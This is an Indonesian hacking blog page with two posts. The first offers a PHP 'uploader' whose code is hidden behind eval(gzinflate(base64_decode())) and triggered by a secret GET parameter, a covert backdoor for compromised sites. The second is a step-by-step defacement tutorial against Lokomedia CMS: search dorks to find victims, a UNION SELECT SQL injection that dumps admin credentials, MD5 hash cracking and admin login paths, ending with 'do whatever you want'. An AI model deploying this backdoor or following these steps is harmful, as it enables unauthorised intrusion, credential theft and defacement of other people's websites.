Kamis, 14 Juli 2016

Download Script Uploader.php Team Madleets

Nah mungkin udah banyak yg share juga nih script ya tapi tak apa lah yg penting post :3
Langsung saja silahkan di copy bro! 





<?php
if($_GET['mad'] == 'leets'){
$a1 = 
 
'ZZFRS8MwEMefLfQ73OIgGzjmiy+uLb5YFAQHc09jlDS90WDShDQVNvG7myybDn273P3u/7/LIW810Ixj59AWy6clrDumEO4hqwu6SBM
 
MgGlNNYT8ZHpO0Wx+AdBsp60Cxp3QXU4IKHStbnJidO8IYMfd3mBO1CCdMMy6eeBnDXOMQBDOyWCkZg1aAqK5eF16iM4MDqLSTkg8t8a
 
4Fwcf392S4gTGYuWlyKmpH2olXHSI+TRJkw8mB19cHy19d20Lv07ngGupbX5dlmXRMv6ODdR7OGhVC5xZrV02D1iRHZc5Dip2ExhXy9f
 
V24YGA7qFPIezNEzhM02uPPTAtdlPxlX5/PK42tCwAN1uqFOmClPT7Q38K8bC1GtA/I+oCquBc+x7GI3oAr68Psoe/0IlE/KH+Pq94en
 
wdPEN';
    eval(gzinflate(base64_decode($a1)));
}
?>





Apa sih kegunaan nih script?
biasanya digunakan para mastah buat Sql Lokomedia, jika ga bisa upload shell biasanya pake nih script.


Oke gaes selamat malam and sampai jumpa

Deface Menggunakan SQL Lokomedia

Yap, ini post pertama kali dan gue akan share sedikit tutor deface dengan Sql lokomedia
Langsung aja Deface Menggunakan SQL Injection CMS lokomedia


Dork : - inurl:kategori-23-hiburan.html
           - inurl:hal-tentang-kami.html
           - inurl:statis-1-pengantar.html
           - inurl:statis-19-beasiswa.html
           - inurl:statis-22-kerjasama.html

kalian kembangin dork nya lagi, supaya dapat yang vuln/bisa di deface

Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+


1. Copy salah satu dork di atas, dan paste di Search Engine (Google) 
2. Pilih salah satu target lalu masukin Exploit nya
seperti ini : target.com/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+hiburan.html

                                       (vuln biasanya di title nampak admin sama kode" gitu)



3. tekan CTRL+U untuk melihan lebih jelas nya tuh username sama pass 



Nah itu yang gue tandain 
Username : admin 
Pass : ee26a843418007e717fff651377da82c
karena pass masih dalam bentuk MD5 maka harus di decrypt (terjemah)



4. open HashKiller >  https://hashkiller.co.uk/md5-decrypter.aspx < dan masukan kode" tersebut 






     
Nah setelah terlihat pass tersebut langsung saja go to admin login gaes 
biasanya admin login terletak di : 
www.target.com/admin
www.target.com/adminweb
www.target.com/administrator
- www.target.com/redaktur


Nah setelah login maka bebas mau kalian apakan 
dah ah gue mau bobo ganteng dulu :3


Mudah kan pake sql lokomedia? 
pesan dari gue, not found bkn berati akhir bro jadi pantang menyerah aja 


Oh iya bila ada kesalahan silahkan di benarkan di kolom komentar kak
yang mau ngasih saran langsung koment aja gaes :*  
gue sekedar share tutorial yang niatan untuk membantu newbie kek gue :'D 
Sekian dan semoga bermanfaat.. thanks para pembaca


./Thoriqul